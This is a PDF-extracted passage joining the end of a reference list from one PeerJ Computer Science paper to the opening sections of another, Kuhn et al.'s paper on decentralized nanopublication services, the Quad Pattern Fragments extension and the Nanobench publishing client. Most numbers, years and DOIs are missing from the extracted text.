in: proceedings of the acm symposium on document engineering. new york: acm, – doi . / . . di mirri s, peroni s, rubano v, salomoni p, vitali f. . towards accessible graphs in html-based scientific articles. in: proceedings of the nd international workshop on accessible devices and services (ads ). ieee doi . /ccnc. . . diggs j, craig j, mccarron s, cooper m. . accessible rich internet applications (wai-aria) . . w c candidate recommendation october . world wide web consortium. available at http://www.w .org/tr/wai-aria- . / . gamma e, helm r, johnson r, vlissides j. . patterns: elements of reusable object- oriented software. new york: addison-wesley. gandon f, schreiber g. . rdf . xml syntax. w c recommendation february . world wide web consortium. available at https://www.w .org/tr/rdf- syntax-grammar/ . gao s, sperberg-mcqueen cm, thompson hs. . w c xml schema definition language (xsd) . part : structures. w c recommendation, april . world wide web consortium. available at https://www.w .org/tr/xmlschema - / . garrish m, siegman t, gylling m, mccarron s. . digital publishing wai-aria module . . w c candidate recommendation december . world wide web consortium. available at https://www.w .org/tr/dpub-aria- . / . hickson i, berjon r, faulkner s, leithead t, doyle navara e, o’connor e, pfeiffer s. . html : a vocabulary and associated apis for html and xhtml. w c recommendation october . world wide web consortium. available at http://www.w .org/tr/html / . jtc /sc wg . iso/iec - : - information technology - document description and processing languages - office open xml file formats - part : fundamentals and markup language reference. . geneva: international peroni et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /sw- http://www.w .org/tr/rdf -concepts/ http://dx.doi.org/ . / . http://dx.doi.org/ . / . http://dx.doi.org/ . /asi. http://dx.doi.org/ . / . http://dx.doi.org/ . /ccnc. . http://www.w .org/tr/wai-aria- . / https://www.w .org/tr/rdf-syntax-grammar/ https://www.w .org/tr/rdf-syntax-grammar/ https://www.w .org/tr/xmlschema - / https://www.w .org/tr/dpub-aria- . / http://www.w .org/tr/html / http://dx.doi.org/ . /peerj-cs. organization for standardization. available at http://www.iso.org/iso/iso_catalogue/ catalogue_tc/catalogue_detail.htm?csnumber= . jtc /sc wg . iso/iec : - information technology - open document format for office applications (opendocument) v . . . geneva: international organization for standardization. available at http://www.iso.org/iso/iso_catalogue/ catalogue_tc/catalogue_detail.htm?csnumber= . kay m. . xsl transformations (xslt) version . . w c recommendation january . world wide web consortium. available at http://www.w .org/tr/ xslt / . lin tty, beales g. . scholarlymarkdown syntax guide. guide, january . available at http://scholarlymarkdown.com/scholarly-markdown-guide.html. national information standards organization. . jats: journal article tag suite. american national standard no. ansi/niso z . - , august . available at http://www.niso.org/apps/group_public/download.php/ /z . - .pdf . osborne f, peroni s. . outcomes of save-sd and question- naires on rash and analysis of rdf annotations in rash papers. figshare. doi . /m .figshare. . peroni s. a. the semantic publishing and referencing ontologies. in: semantic web technologies and legal scholarly publishing. cham: springer, – . peroni s. b. semantic web technologies and legal scholarly publishing. in: law, governance and technology series . cham: springer. peroni s. . rash framework . . . zenodo doi . /zenodo. . peroni s, shotton d. . fabio and cito: ontologies for describing bibliographic re- sources and citations. web semantics : – doi . /j.websem. . . . pettifer s, mcdermott p, marsh j, thorne d, villeger a, attwood tk. . ceci n’est pas un hamburger: modelling and representing the scholarly article. learned publishing ( ): – doi . / . prud’hommeaux e, carothers g. . turtle—terse rdf triple language. w c recommendation february . world wide web consortium. available at http://www.w .org/tr/turtle/ . raggett d, le hors a, jacobs i. . html . specification. w c recommendation, december . world wide web consortium. available at http://www.w .org/ tr/html / . shotton d, portwin k, klyne g, miles a. . adventures in semantic publishing: exemplar semantic enhancements of a research article. plos computational biology ( ):e doi . /journal.pcbi. . spinaci g, peroni s, di iorio a, poggi f, vitali f. . the rash javascript editor (raje)—a wordprocessor for writing web-first scholarly articles. in: proceeding of the th acm symposium on document engineering (doceng ). new york: acm, – doi . / . . sporny m. . html+rdfa . : support for rdfa in html and html . w c recommendation march . world wide web consortium. available at http: //www.w .org/tr/rdfa-in-html/ . peroni et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://www.iso.org/iso/iso_catalogue/catalogue_tc/catalogue_detail.htm?csnumber= http://www.iso.org/iso/iso_catalogue/catalogue_tc/catalogue_detail.htm?csnumber= http://www.iso.org/iso/iso_catalogue/catalogue_tc/catalogue_detail.htm?csnumber= http://www.iso.org/iso/iso_catalogue/catalogue_tc/catalogue_detail.htm?csnumber= http://www.w .org/tr/xslt / http://www.w .org/tr/xslt / http://scholarlymarkdown.com/scholarly-markdown-guide.html http://www.niso.org/apps/group_public/download.php/ /z . - .pdf http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /zenodo. http://dx.doi.org/ . /j.websem. . . http://dx.doi.org/ . / http://www.w .org/tr/turtle/ http://www.w .org/tr/html / http://www.w .org/tr/html / http://dx.doi.org/ . /journal.pcbi. http://dx.doi.org/ . / . http://www.w .org/tr/rdfa-in-html/ http://www.w .org/tr/rdfa-in-html/ http://dx.doi.org/ . /peerj-cs. sporny m, kellogg g, lanthaler m. . json-ld . —a json-based serialization for linked data. w c recommendation january . world wide web consortium. available at https://www.w .org/tr/json-ld/ . walsh n. . the docbook schema version . . oasis standard, november . burlington: organization for the advancement of structured information standards. available at http://docs.oasis-open.org/docbook/specs/docbook- . -spec-os.html. peroni et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://www.w .org/tr/json-ld/ http://docs.oasis-open.org/docbook/specs/docbook- . -spec-os.html http://dx.doi.org/ . /peerj-cs. semantic micro-contributions with decentralized nanopublication services semantic micro-contributions with decentralized nanopublication services tobias kuhn , ruben taelman , vincent emonet , haris antonatos , stian soiland-reyes , and michel dumontier department of computer science, vu amsterdam, amsterdam, netherlands idlab, ghent university, ghent, belgium institute of data science, maastricht university, maastricht, netherlands scify, athens, greece informatics institute, university of amsterdam, amsterdam, netherlands department of computer science, the university of manchester, manchester, uk abstract while the publication of linked data has become increasingly common, the process tends to be a relatively complicated and heavy-weight one. linked data is typically published by centralized entities in the form of larger dataset releases, which has the downside that there is a central bottleneck in the form of the organization or individual responsible for the releases. moreover, certain kinds of data entries, in particular those with subjective or original content, currently do not fit into any existing dataset and are therefore more difficult to publish. to address these problems, we present here an approach to use nanopublications and a decentralized network of services to allow users to directly publish small linked data statements through a simple and user-friendly interface, called nanobench, powered by semantic templates that are themselves published as nanopublications. the published nanopublications are cryptographically verifiable and can be queried through a redundant and decentralized network of services, based on the grlc api generator and a new quad extension of triple pattern fragments. we show here that these two kinds of services are complementary and together allow us to query nanopublications in a reliable and efficient manner. we also show that nanobench makes it indeed very easy for users to publish linked data statements, even for those who have no prior experience in linked data publishing. subjects human-computer interaction, digital libraries, world wide web and web science keywords nanopublications, semantic web, linked data, semantic publishing introduction linked data has achieved remarkable adoption (bizer, heath & berners-lee, ; schmachtenberg, bizer & paulheim, ), but its publication has remained a complicated issue. the most popular methods for publishing linked data include subject pages (berners-lee, ), sparql endpoints (feigenbaum et al., ), and data dumps. the latter are essentially just rdf files on the web. such files are not regularly indexed on a global scale by any of the existing search engines and therefore often lack discoverability, but they are the only option that does not require the setup of a web server for users wanting to publish linked data on their own. while one of the fundamental ideas behind the web is that anyone should be able to express themselves, linked data publishing is therefore mostly done by large centralized entities such as dbpedia (auer et al., ) and how to cite this article kuhn t, taelman r, emonet v, antonatos h, soiland-reyes s, dumontier m. . semantic micro-contributions with decentralized nanopublication services. peerj comput. sci. :e doi . /peerj-cs. submitted august accepted january published march corresponding author tobias kuhn, t.kuhn@vu.nl academic editor chiara ghidini additional information and declarations can be found on page doi . /peerj-cs. copyright kuhn et al. distributed under creative commons cc-by . http://dx.doi.org/ . /peerj-cs. mailto:t.�kuhn@�vu.�nl https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://www.creativecommons.org/licenses/by/ . / http://www.creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ wikidata (vrandečić & krötzsch, ). even such community-driven datasets have clear guidelines on what kind of data may be added and typically do not allow for subjective or original content, such as personal opinions or new scientific findings that have otherwise not yet been published. it is therefore difficult for web users to publish their own personal pieces of linked data in a manner that the published data can be easily discovered, queried, and aggregated. to solve these shortcomings, we propose here a complementary approach to allow for what we call semantic micro-contributions. in contrast to the existing linked data publishing paradigms, semantic micro-contributions allow individual web users to easily and independently publish small snippets of linked data. we show below how such semantic micro-contributions can be achieved with nanopublications and semantic templates, and how we can make such a system redundant and reliable with a decentralized network of services. we will explain below how this approach differs from other decentralization approaches that have been proposed in the context of linked data publishing (including solid and blockchain-based approaches). concretely, we investigate here the research question of how we can build upon the existing nanopublication publishing ecosystem to provide query services and intuitive user interfaces that allow for quick and easy publishing of small linked data contributions in a decentralized fashion. our concrete contributions are: . a concrete scheme of how nanopublications can be digitally signed and thereby reliably linked to user identities, . two complementary sets of nanopublication query services building upon extensions of existing linked data technologies, one based on the grlc api generator and the other one in the form of an extension of triple pattern fragments called quad pattern fragments (qpf), . a user interface connecting to these services that allows for simple nanopublication publishing based on the new concept of nanopublication templates, and . positive evaluation results on the above-mentioned query services and user interface. below, we outline the relevant background, introduce the details of our approach, present and discuss the design and results of two evaluations, and outline future work. background before we introduce our approach, we give here the relevant background in terms of our own previous work, and other related research on the topics of the use of semantic technologies for scientific publishing, linked data apis, and decentralization. under the label of semantic publishing (shotton, ), a number of approaches have been presented to align research and its outcomes with linked data in order to better organize, aggregate, and interpret scientific findings and science as a whole. we have previously argued that these linked data representations should ideally come directly from the authors (i.e., the researchers), should cover not just metadata properties but the content of the scientific findings themselves, and should become the main publication object instead of papers with narrative text, in what we called genuine semantic publishing kuhn et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ (kuhn & dumontier, ). nanopublications (mons et al., ) are one of the most prominent proposals to implement this. they are small independent pieces of linked data that encapsulate atomic statements in the form of a few rdf triples (this part is called the assertion graph) together with formal provenance information (the provenance graph, e.g., pointing to the study that the assertion was derived from) and metadata (the publication info graph, e.g., by whom and when was the nanopublication created). while the original nanopublication proposal focused on assertions with domain statements (such as expressing a link between a gene and a disease), we subsequently suggested to broaden their scope and to use them also to express bibliographic and other meta-level information, statements about other nanopublications, vocabulary definitions, and generally any kind of small and coherent snippet of linked data (kuhn et al., ). in order to make nanopublications verifiable and to enforce their immutability, we then showed how cryptographic hash values can be calculated on their content and included in their identifiers in the form of trusty uris (kuhn & dumontier, ). based on this, we established a decentralized and open server network, through which anybody can reliably publish and retrieve nanopublications (kuhn et al., ), and we introduced index nanopublications, which allow for assigning nanopublications to versions of larger datasets (kuhn et al., ). the work to be presented below is a continuation of this research line, adding query services and an intuitive publishing interface as components to this ecosystem. our general approach is partly related to semantic wikis, for example, ghidini et al. ( ), baumeister, reutelshoefer & puppe ( ) and kuhn ( ). they combine the ideas of the semantic web with the wiki concept, and therefore allow for quick and easy editing of semantic data. they focus on the collaborative process of consensus finding and its result in the form of a single coherent formal knowledge base, and as such, they focus less on individual contributions as the unit of reference. in terms of linked data apis, sparql endpoints (feigenbaum et al., ) are probably the most well-known example and they are often used for providing queryable access to rdf datasets. in practice, such endpoints often suffer from availability problems (buil-aranda et al., ), due to their public nature and the uncontrolled complexity of sparql queries. the linked data fragments (ldf) framework (verborgh et al., ) was initiated as an attempt to investigate alternative rdf query interfaces, where the total query effort can be distributed between server and client. triple pattern fragments (tpf) (verborgh et al., ), for example, heavily reduce the expressivity of queries that can be evaluated by a server, so clients that want answers to more complex sparql queries need to take up part of the execution load themselves. through client-side query engines, such as comunica (taelman et al., ), complex sparql queries can be split into multiple triple pattern queries that can be executed separately by a tpf server and then joined to create the full result on the client-side. another approach to address the problems of full sparql endpoints is grlc (meroño-peñuela & hoekstra, ), a tool that automatically generates apis from sparql templates. by providing a small number of possible api operations instead of sparql’s virtually unlimited query possibilities, grlc makes linked data access easier and better manageable on both, the client and server kuhn et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ side. a further noteworthy technology is the linked data platform (ldp) (speicher, arwe & malhotra, ) to manage and provide linked data. in order to establish connections between producers and consumers of linked data, subscription and notification protocols such as websub (https://www.w .org/tr/websub/) and provenance pingbacks (https://www.w .org/tr/prov-aq/#provenance-pingback) have been proposed. the approaches above mostly assume requests are targeted towards a central server. this centralization comes with the downsides that such a server forms a single point of failure, that we need to trust in the authority that runs it, and that it is difficult to scale. to address these problems, a number of more decentralized approaches have been proposed. ldf interfaces such as tpf, as introduced above, can in fact also be used in a more distributed fashion, as fragments can be published across different servers (delva et al., ). distributed approaches to semantically annotate web pages like https://schema.org/ (guha, brickley & macbeth, ) have moreover shown strong adoption. another example is solid (mansour et al., ), where users have their own personal linked data pod, in which they can store their own data and thereby are in full control of who can access it. solid thereby targets personal and potentially confidential data, with a focus on access control and minimizing data duplication. the solid ecosystem has been applied in a number of use cases, such as collaboration within decentralized construction projects (werbrouck et al., ), and decentralization of citizen data within governments (buyle et al., ). such approaches where data is distributed but not replicated, however, often lead to major difficulties when queries need to be executed over such a federation of data sources (taelman, steyskal & kirrane, ). this stands in contrast to decentralized approaches where data is not only distributed but also replicated, which typically target open and public data and have an emphasis on scalability and reliability. blockchain-based solutions fall into the latter category, for which a whole range exists of possible approaches to integrate linked data (third & domingue, ). a core trade-off of all blockchain-based approaches is to either sacrifice some degree of decentralization with permissioned blockchains or to pay the price of the expensive mining process. for applications that do not crucially depend on a fixed and agreed-upon order of events, as cryptocurrencies do for their transaction ledger, the costs of blockchain-based solutions in fact often do not seem to offset their benefits. our approach to be presented below also falls into this second category of decentralization approaches with replicated data sources, but does not entail the costs of blockchain-based approaches. approach the approach to be presented here, as shown in fig. , is based on our work on nanopublications and the ecosystem for publishing them, as introduced above. the core of this new approach is to allow end-users to directly publish linked data snippets in the form of nanopublications with our existing decentralized nanopublication publishing network through an interface powered by semantic templates, which are themselves published as nanopublications. below we explain how users can establish their identity by announcing their public key, and how they can then sign, publish, and update their kuhn et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://www.w .org/tr/websub/ https://www.w .org/tr/prov-aq/#provenance-pingback https://schema.org/ http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ nanopublications. then we describe our extension of triple pattern fragments to support quads and thereby nanopublications. next, we show how we defined two complementary sets of services on top of the existing nanopublication network to query and access the published data in a redundant and reliable way. finally, we explain how these components together with semantic templates allowed us to build a flexible and intuitive end-user application called nanobench. identities and updates nanopublications typically specify their creator in the publication info graph, but because anybody can publish anything they want through the existing open nanopublication network, there is no guarantee that this creator link is accurate. for that reason, we propose here a method to add a digital signature to the publication graph. with our approach, users have to first introduce their identifier and public key before they can publish their own nanopublications. this introduction is itself published as a signed nanopublication declaring the link between the personal identifier (such as an orcid identifier) and the public key in its assertion graph, as shown by this example: sub:assertion { sub:keydeclaration npx:declaredby orcid: - - - ; npx:hasalgorithm "rsa"; npx:haspublickey "migfma gcsqgsib dqebaquaa gnadcbiqk…" . } below, we will come back to the question of how we can ensure that this user is indeed in control of the stated orcid identifier. once an identity is established in this way, the respective user can publish nanopublications such as the one shown in fig. , where the personal identifier and the public key are mentioned in the publication info graph (yellow) together with the digital signature that is calculated with the respective private key on the entire nanopublication, excluding only the npx:hassignature triple and the hash code of the trusty uri. the trusty uri (here represented with the prefix this: ) is figure the architecture of our overall approach. full-size doi: . /peerj-cs. /fig- kuhn et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ calculated as a last step, which therefore also covers the signature. this makes the nanopublication including its signature verifiable and immutable. immutability is a desirable property to ensure stable and reliable linking, but for practical purposes it has to come with a mechanism to declare updates and mark obsolete entries. with our approach, new versions of a nanopublication can be declared with the npx:supersedes property in the publication info graph of the nanopublication containing the update, for example: sub:pubinfo { this: npx:supersedes <http://purl.org/np/ravjbxcgsf r yujeahc arcgqttn bthoekz hpfprc> . … } in order to declare a nanopublication obsolete without an update, the npx:retracts property can be used in the assertion graph of a separate retraction nanopublication, for example: sub:assertion { orcid: - - - npx:retracts <http://purl.org/np/rals z wzbjvsj mzlaix _gicnnn rmalzd-yjpyo> . } figure example nanopublication in trig notation that was published with nanobench. full-size doi: . /peerj-cs. /fig- kuhn et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ of course, updated versions and retractions should only be considered valid if authorized by the author of the original nanopublication. for the scope of this work, we only consider them valid if the retraction or update is signed with the same key pair, but more flexible solutions are possible in the future. the elements introduced so far allow us to cryptographically verify that given nanopublications were published by the same user who introduced herself in her introduction nanopublication, but they still allow anybody to claim any orcid identifier (or other kind of identifier). to add this missing link, users can add the link of their introduction nanopublication to their orcid profile under “websites & social links”, which proves that they have control of that account. this link is represented with foaf:page when the user identifier is resolved with a http get request asking for an rdf representation via content negotiation. this is thereby a general method that can work on any url scheme and identification mechanism providing dereferenceable user identifiers, but for simplicity we will restrict our discussion here to orcid identifiers. quad pattern fragments nanopublications, as can be seen in fig. , are represented as four named rdf graphs. triple pattern fragments, however, as their names indicates, only support triples and not quads (which include the graph information), and tpf is therefore insufficient for querying nanopublications. for this reason, we introduce an extension of tpf to support quads, called quad pattern fragments (qpf) (https://linkeddatafragments.org/ specification/quad-pattern-fragments/). in order to allow querying over qpf, its http responses include metadata that declaratively describe the controls via which querying is possible. these controls are defined in a similar way as for tpf using the hydra core vocabulary (lanthaler & gütl, ), and allows intelligent query engines to detect and use them. below, an example of these controls is shown: @prefix rdf: <http://www.w .org/ / / -rdf-syntax-ns#>. @prefix hydra: <http://www.w .org/ns/hydra/core#>. @prefix void: <http://rdfs.org/ns/void#>. @prefix sd: <http://www.w .org/tr/sparql -service-description/#>. <https://example.org/#dataset> a void:dataset, hydra:collection; void:subset <https://example.org/>; sd:defaultgraph <urn:ldf:defaultgraph>; hydra:search _:pattern. _:pattern hydra:template "https://example.org/{?s,p,o,g}"; hydra:variablerepresentation hydra:explicitrepresentation; hydra:mapping _:subject, _:predicate, _:object, _:graph. _:subject hydra:variable "s"; hydra:property rdf:subject. _:predicate hydra:variable "p"; hydra:property rdf:predicate. kuhn et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://linkeddatafragments.org/specification/quad-pattern-fragments/ https://linkeddatafragments.org/specification/quad-pattern-fragments/ http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ _:object hydra:variable "o"; hydra:property rdf:object. _:graph hydra:variable "g"; hydra:property sd:graph. the control above indicates that the qpf api accepts four url parameters, corresponding to the four elements of a quad. for example, a query to this api for the pattern ?s npx:retracts ?o sub:assertion would result in an http request for the url https://example.org/?p=npx:retracts&g=sub:assertion . just like with tpf, intelligent clients can be built that can handle more complex queries (such as sparql queries) over qpf apis. this requires these clients to split up a sparql query into multiple quad patterns, which can be resolved by the api, after which they can be joined by the client to form a complete query result. qpf has been designed to be backwards-compatible with tpf. this means that clients that implement support for tpf apis, but do not understand the notion of qpf, will be able to recognize the api as tpf, and execute triple pattern queries against it. due to the declaratively described qpf and tpf controls, clients such as the comunica engine can recognize and make use of both variants next to each other. a live version of a qpf api can be found at https://ldf.nanopubs.knows.idlab.ugent.be/np, which is one of six instances of this service in our network . nanopublication services nanopublications can be reliably and redundantly published by uploading them to the existing nanopublication server network (kuhn et al., ), which at the time of writing consists of eleven severs in five countries and storing more than million nanopublications (http://purl.org/nanopub/monitor). this network implements a basic publishing layer where nanopublications can be looked up by their trusty uri, but no querying features are provided. in order to allow for querying of the nanopublications’ content, we present here our implementation of a new service layer built on top of the existing publication layer. while we are using a triple store with sparql under the hood, we do not provide a full-blown sparql endpoint to users in order to address the above-mentioned problems of availability and scalability. for our nanopublication service layer, we employ a mix of two kinds of services that are more restricted than sparql but also more scalable. the first kind of service is based on ldf via our qpf api, as introduced above, and allows only for simple queries at the level of individual rdf statements but does not impose further restrictions. the second one is based on the grlc api generator (meroño-peñuela & hoekstra, ), which optionally comes with the tapas html interface (lisena et al., ) and which can be used to execute complex queries but is restricted to a small number of predefined patterns. the ldf-based services reduce the complexity and load on the server by only allowing for very simple queries to be asked to the server, and delegate the responsibility of orchestrating them to answer more complex questions to the client. the grlc-based for simplicity, urls for p and g are prefixed, whereas they will be expanded in practise. a live example of a qpf client that can query over this api can be found at http://query.linkeddatafragments.org/ #datasources=https% a% f% fldf. nanopubs.knows.idlab.ugent.be% fnp. kuhn et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://example.org/?p=npx:retracts&g=sub:assertion https://ldf.nanopubs.knows.idlab.ugent.be/np http://purl.org/nanopub/monitor http://query.linkeddatafragments.org/#datasources=https% a% f% fldf.nanopubs.knows.idlab.ugent.be% fnp http://query.linkeddatafragments.org/#datasources=https% a% f% fldf.nanopubs.knows.idlab.ugent.be% fnp http://query.linkeddatafragments.org/#datasources=https% a% f% fldf.nanopubs.knows.idlab.ugent.be% fnp http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ services reduce the complexity and load by allowing only for queries that are based on a small number of sparql templates that are hand-crafted for optimized performance. these two kinds of services are thereby designed to be complementary, with grlc being restricted but faster and ldf being more powerful but slower. the grlc-based services provide general api operations that are based on sparql templates: � find_nanopubs returns all nanopublication identifiers in undefined order (paginated in groups of , ) possibly restricted by the year, month, or day of creation; � find_nanopubs_with_pattern additionally allows for specifying the subject, predicate, and/or object of a triple in the nanopublication as a filter, and to restrict the occurrence of that triple to the assertion, provenance, or publication info graph; � find_nanopubs_with_uri similarly allows for filtering by a uri irrespective of its triple position; � find_nanopubs_with_text supports full-text search on the literals in the nanopublication (using non-standard sparql features available in virtuoso and graphdb); � for each of the four find_nanopubs_* templates mentioned above, there is also a find_signed_nanopubs_* version that only returns nanopublications that have a valid signature and that allows for filtering by public key; � get_all_indexes returns all nanopublication indexes (i.e., sets of nanopublications); � get_all_users returns all users who announced a public key via an introduction nanopublication; � get_backlinks returns all identifiers of nanopublications that directly point to a given nanopublication; � get_deep_backlinks does the same thing but includes deep links through chains of nanopublications linking to the given one; � get_latest_version returns the latest version of a given nanopublication signed by the same public key by following npx:supersedes backlinks; � get_nanopub_count returns the number of nanopublications, possibly restricted by year, month, or day of creation. the full sparql templates can be found in the supplemental material (see below). these api calls provide a general set of queries based on which applications with more complex behavior can be built. we will introduce nanobench as an example of such an application below. in order to answer some of the above queries, auxiliary data structures have to be created while loading new nanopublications. most importantly, digital signatures cannot be checked in sparql directly, as this involves translating the triples of a nanopublication into a normalized serialization and then calculating a cryptographic hash function on it, which goes beyond sparql’s capabilities. other aspects like deep backlinks are complicated because it is not sufficient to check whether a link is present, but we also need kuhn et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ to check that the respective triple is located in the linking nanopublication (as a triple linking two nanopublications could itself be located in a third nanopublication). in order to solve these problems, additional triples in two administrative graphs are generated when new nanopublications are loaded. concretely, the following triples are added for each nanopublication (placeholders in capitals): npa:graph { <npuri> npa:hasheadgraph <headuri> ; dct:created "datetime"^^xsd:datetime ; npa:creationday <http://purl.org/nanopub/admin/date/year-month-day> ; npa:creationmonth <http://purl.org/nanopub/admin/date/year-month> ; npa:creationyear <http://purl.org/nanopub/admin/date/year> ; npa:hasvalidsignatureforpublickey "publickey" . } npa:networkgraph { <npuri> <inter-np-predicate> referenced-npuris… . <npuri> npa:referstonanopub referenced-npuris… . } the first triple of the npa:graph links the nanopublication identifier to its head graph, where the links to its assertion, provenance, and publication info graphs can be found. the second one contains the creation date in a normalized form. number three to five allow for efficient filtering by day, month, and year, respectively (we use uris instead of literals because this happens to be much faster for filtering under virtuoso). the final triple in the npa:graph links the nanopublication to its public key if the signature was found to be valid. in the npa:networkgraph, all instances of linking to another nanopublication with the linking nanopublication uri in subject position are added (e.g., with npx: supersedes). in the cases where another nanopublication is linked but not with the pattern of the linking nanopublication in subject position (e.g., as with npx:retracts), npa:referstonanopub is used as predicate to link the two nanopublications. we set up a network of six servers in five different countries each providing both of the introduced services (ldf-based and grlc-based). they are notified about new nanopublications by the servers of the existing publishing network, which are otherwise running independently. the services connect to a local instance of a virtuoso triple store (https://virtuoso.openlinksw.com/), into which all nanopublications are loaded via a connector module. this connector module also creates the additional triples in the administrative graphs as explained above. while the restriction to predefined templates with grlc significantly improves the scalability of the system as compared to unrestricted sparql, further measures will be needed in the future if the number of nanopublications keeps growing to new orders of magnitude. the services presented here are designed in such a way that such measures are possible with minimal changes to the api. the query templates of the grlc services can be distributed to different servers, for example, such that a single server would only be kuhn et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://virtuoso.openlinksw.com/ http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ responsible for one of the kinds of queries. this server could then use an optimized data structure for exactly that kind of query and would only need to hold a fraction of the data. the find_ queries could moreover be further compartmentalized based on publication date, for example each server instance just covering a single year. the ldf-based services could be distributed in a similar fashion, for example based on the predicate namespace. nanobench client and templates to demonstrate and evaluate our approach, we next implemented a client application that runs on the user’s local computer, can be accessed through their web browser, and connects to the above decentralized network of services. the code can be found online (https://github.com/peta-pico/nanobench) and fig. shows a screenshot. in the “search” part of the interface, users are provided with a simple search interface that connects to the grlc api operations find_nanopubs_with_uri (if a uri is entered in the search field) or find_nanopubs_with_text (otherwise). in the “others” part, other users’ latest nanopublications can be seen in a feed-like manner, similar to twitter feeds. in order for users to publish their own nanopublications and thereby create their own feed, they have to first set up their profile. nanobench provides close guidance through this process, which involves the declaration of the user’s orcid identifier, the creation of an rsa key pair, and the publication of an introduction nanopublication that links the public key to the orcid identifier. the last step of linking the new introduction nanopublication from the user’s orcid profile is not strictly necessary for the user to start publishing nanopublications and is therefore marked as optional. once the user profile is completed, a list of templates is shown in the “publish” part of the interface. templates are published as nanopublications as well, and so this list can be populated via a call to the find_signed_nanopubs_with_pattern operation of the grlc-based services. currently, the list includes templates for free-text commenting on a url, expressing a foaf:knows relation to another person, declaring that the user has read a given paper, expressing a gene–disease association, retracting a nanopublication, describing a datasets with a sparql endpoint, and publishing an arbitrary rdf triple. figure a screenshot of the nanobench application with a publication form. full-size doi: . /peerj-cs. /fig- kuhn et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://github.com/peta-pico/nanobench http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ after selecting a template, a form is automatically generated that allows the user to fill in information according to that template, as shown in fig. . templates describe the kind of statements users can publish and also provide additional information on how the input form should be presented to the user. this is an example of a template (the same one that is shown in fig. ), defined in the assertion graph of a nanopublication: sub:assertion { sub:assertion a nt:assertiontemplate ; rdfs:label "expressing that you know somebody" ; nt:hasstatement sub:st . sub:st a rdf:statement ; rdf:subject nt:creator ; rdf:predicate foaf:knows ; rdf:object sub:person . foaf:knows rdfs:label "know" . sub:person a nt:uriplaceholder ; rdfs:label "orcid identifier of the person you know" ; nt:hasprefix "https://orcid.org/" ; nt:hasregex "[ - ]{ }-[ - ]{ }-[ - ]{ }-[ - ]{ }[ - x]" . } in a template nanopublication, the assertion graph is classified as an assertiontemplate (in the namespace https://w id.org/np/o/ntemplate/) and given a human readable label with rdfs:label. moreover, it is linked to the statement templates (i.e., triples in the nanopublications to be published) via hasstatement. the above example has just one such statement template, but more complex templates involve several of them. these templates then use regular rdf reification to point to their subjects, predicates, and objects. in the case of multiple statements, their order in the form can be defined with statementorder and some of them can be marked as optional by classifying them as optionalstatement. rdfs:label can be used on all the elements to define how they should be labeled in the form interface, and the special uri creator is mapped to the identifier of the user applying the template. importantly, the uris in subject, predicate, or object position of the template statements can be declared placeholders with the class uriplaceholder, and similarly for literals with literalplaceholder. such placeholders are represented as input elements, such as text fields or drop-down menus, in the form that is generated from the template. currently supported more specific placeholder types include trustyuriplaceholder, which requires a trusty uri (such as a nanopublication uri), and restrictedchoiceplaceholder, which leads to a drop-down menu with the possible options defined by the property possiblevalue. for uri placeholders, prefixes can be defined with hasprefix and regex restrictions with hasregex, as can be seen in the example above. kuhn et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://w id.org/np/o/ntemplate/ http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ once the user filled in a form that was generated from a template and clicks on “publish”, nanobench creates the assertion graph of a new nanopublication by following the template and replacing all the placeholders with the user’s input. for the provenance graph, only a simple prov:wasattributedto link to the user’s identifier is currently added (we are working on extending the coverage of templates to the provenance and publication info graphs). in the publication info graph, nanobench adds a timestamp, specifies the user as the creator of the nanopublication, and adds a wascreatedfromtemplate link that points to the underlying template nanopublication. then, nanobench adds a digital signature element to the publication info graph with a signature made from the user’s local private key, transforms the whole nanopublication into its final state with a trusty uri, and finally publishes it to the server network with a simple http post request. within a few minutes or less, it then appears in the user’s feed. nanobench currently makes use of the redundancy of the nanopublication services in a very simple way: for each query, it randomly selects two grlc service instances and sends the same query to both. it then processes the result as soon as it gets the first answer and discards the second, thereby increasing the chance of success and lowering the average waiting time. more sophisticated versions of this protocol are of course easily imaginable and will be investigated in future work. performance evaluation in order to evaluate our approach, we introduce here a performance evaluation that we ran on the network of nanopublication services. in the next section we will then look into whether these services are useful to potential end users with a usability evaluation on nanobench. performance evaluation design for this performance evaluation we wanted to find out how well the two types of services— ldf-based and grlc-based—perform in our network of services, how they compare, and to what extent they are really complementary. for this purpose, we defined a set of concrete queries that we can then submit to both services. we started with the query templates of the grlc-based service, and instantiated each of them with a simple set of parameters to make concrete executable queries. as parameter values, we chose generic yet realistically useful examples that return non-trivial answer sets for the kind of nanopublications that the current templates describe: ( ) find_nanopubs restricted to the month - ; ( ) find_nanopubs_with_pattern with the predicate value set to foaf:knows; ( ) find_nanopubs_with_text on the free-text keyword “john”; ( ) find_nanopubs_with_uri to search for nanopublications 